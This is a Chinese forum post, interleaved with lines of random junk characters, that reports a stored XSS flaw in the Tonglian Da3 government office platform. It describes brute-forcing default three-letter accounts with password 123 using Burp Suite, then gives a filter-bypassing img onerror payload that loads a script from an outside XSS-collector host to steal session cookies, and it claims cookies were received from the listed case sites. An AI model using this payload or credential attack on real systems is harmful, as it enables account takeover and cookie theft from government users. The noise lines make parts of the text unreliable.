. c% s2 J q5 n3 G3 D
; b* o& [1 }1 R1 g( y7 H 同联Da3协同办公平台后台通用储存型xss漏洞6 ] s# [, S( ]* S( ]9 V
1 J# l& t* |" Y- M ) u# A/ h: m: r# ~6 J1 ~8 m
平台简介:* |( j8 L+ A4 |. ?3 [1 [# w
2 S1 r0 R/ _7 y- ^/ ?7 f0 i; A' U
5 R: y& \# s# `6 l' t
5 w4 {2 U, ?/ `7 c
* b% d4 t g: R/ | " O! x8 O- t9 I H) g
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
: ?& F' y9 L% ~9 Q5 z# O同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
1 M& a) y, b; V2 | v
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!: ~% ^9 U% T, o+ u/ R# \: z4 b
* S$ Z" U, d3 \0 X; ]2 ^ u# N7 b
4 W8 _- |: r5 v- q3 }" {
# T- o0 ^! B6 l/ L. T% W( |1 H0 |
0 g- [ e2 P3 C, L( o: t
% a- B( O( e0 w( M0 K4 ]
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:7 [6 ?2 ^4 f/ f! \8 L. J2 U
: R( _% _8 ]/ b4 q+ S6 ~# T 8 y8 J0 W% f0 G
; o9 L- D j8 K. }
3 O7 ?- S* f+ }7 E
8 w$ x9 g* ^9 f3 z: F* E# s http://1.1.1.1:7197/cap-aco/#(案例2-)
3 z( M6 f. k' w7 h# j: q
+ [4 r7 ^" G N! f }& t, h/ @/ y 0 g- { d6 M9 \0 F. l# }1 E
http://www.XXOO.com (案例1-官网网站)
7 D; T% A* R4 z, H# s. v
, \1 y* Q2 z$ f! w5 T6 d. M
" R& U& S5 ?. U4 S) N6 t' X, K 漏洞详情:
9 l% P8 r2 [$ w( x% M: u+ h8 K
6 U6 a3 [* b3 Q4 W8 U0 s0 s - {& w, C2 o# z7 r3 ^9 D3 ]% p2 c
案例一、* Q) p! ]# E5 m( _
; @2 l4 S; P0 x2 x ; A2 C% j, t: L5 m, f, ~& z$ z
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
# j. I) N# a# x. ^( G# }3 Y
+ |9 s9 k, Y% N" F5 W
4 o( n$ f# J8 ~0 A0 C% E6 Z. { 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:4 n0 w7 A& D8 l. b6 {; w5 }' w6 x
2 M* O9 M) P+ ?/ G% `1 p* O
5 b4 l% S, _/ f$ y- G4 `4 q! a
4 f3 |6 c J y' a7 } ?
1 x- I3 s2 w" m0 X) X, {3 C- W
! [; n1 u4 e* l+ ?! N* I 
: f/ n5 x* n( D3 Y
6 P: H# o' }" i: @( t! a4 B3 j
`; U9 v7 d' x status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
& X, l/ p4 ]4 c$ e1 `. d+ ]3 B
, x5 V8 D6 ]: i! w; a, E 7 F" e( |! d }( i. s3 S" y& V8 f
* c+ s y `3 ~; k$ y! e
2 d: j C6 k- t4 I& h
$ x4 h7 K4 T# x 
l/ V/ [1 P" t: B0 G9 o
3 M& w( p9 y, q* u+ @( c
. r" ^! ^6 j; C" v: |( x3 e 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 % s! b1 A' @3 [, F4 i
5 a1 \ o: t, j& U) q4 k% P
% |7 F" p3 r' f2 Y6 a+ }
& N' [) A/ p; i+ K1 n) V% \# v
. L! }* y6 I/ n3 z( W+ A( D
4 Y! x' J) o5 L, N <img src=x
, U' p; D5 S5 E* Qonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
- E5 B$ f4 y; M& G- M7 T
. b% g9 x, C+ ^1 C. a, g+ G3 j! W1 j( ^# W 5 `/ \3 q0 J9 f% b+ ~: p V
% m, H3 {$ |' |+ c" V' ^
* |' ?0 x" V4 L% L
9 O5 h) @& A3 z( t# _% P/ | 然后发送,接收cookie如图:
: N+ U* h" S5 l' R9 K, y0 j
& \; P l# I& f1 p8 O8 P: h# \
. f, q$ Q, t' d6 ^
$ e* |; i' d: L% Q7 u* B
; a1 h$ C/ X( k- t3 M5 g& V, o
* Q2 l" o& h$ Y" }9 u
) k( v# X! W' b5 F, g
& x0 j$ A3 Q4 r4 _
+ l5 B% A2 J: ?, d , D6 ` G6 Q$ v+ K$ d7 ^- U
$ G- J: ^* x4 K/ Y
/ }* T# U* l X- u6 F" g9 v& l
; h2 P2 t( m6 i1 g
. s: E& Y% Q+ n: Q& c2 `
" B- @0 J) ?- I8 ~! z' R 
6 E/ z$ G* N7 x4 w
7 z) o5 {; ]6 J# h: F* w6 u , g6 X0 i, |9 M! T) i
4 N% Z. W1 ]" H3 o# J' s2 _
# i6 e k% V4 v6 W& v- T
( D# A# M. H( _8 V; \4 g
$ L0 n3 f5 q, E- G2 `- Q
* n( }( P4 U/ C: j ( R6 D Q$ L- N! R p) P
案例2、
# f; c q @; m0 g3 [- f
1 x* E+ { a6 C& O2 F % C" o8 I. r2 u) l- B
前面步骤都一样,下面看效果图:
$ e+ `1 Y7 E. ?
- \+ W5 a& e4 a) J& S9 S
/ M# u4 `7 K0 w9 v( V9 ] 
3 ^: n& D' H) Q" M+ ^" a
; P6 s$ L2 M" Y' j [$ |
1 m Y; I; S) r4 b1 }
! r7 b7 s1 V7 h8 |8 S0 @
1 B) s. \# m/ F0 c3 F& i- S+ x
% H% P1 G2 J- f7 i# O; ^, m& g8 C: y! `
# M% Q( M3 H+ C2 n
" _- }1 V$ `) ~& }
& ?2 A3 U4 ?0 M# C
, q# V. I% j5 z: @* l/ ~
# d) M+ ?6 L: n! H( \
4 p. g. T& f) b" { 
( d) B* e- _) L. f/ V( l: |
4 n" l& m! V! Y ]
3 n% p" Q8 m" _, _3 a O / S7 t4 }% t. a" j" K+ ?0 \
9 Y+ k9 m; {5 {7 a) Z
0 l8 q; y S1 R" i, h( K7 F" u
4 ?( a( T$ R i* r X
|, Y0 U0 T; Y
+ O2 s; D5 ?6 ]. a # \3 O6 M1 g* g3 Q- Q# p& \
8 `/ q% m% v* j: c
2 M/ B3 H. H( l* J$ y% q6 ]* S
. k& x" k& c4 F! a
( p: P: L+ j6 c; D: ?. G 
发表于 2018-10-20 20:14:15
收藏
支持
反对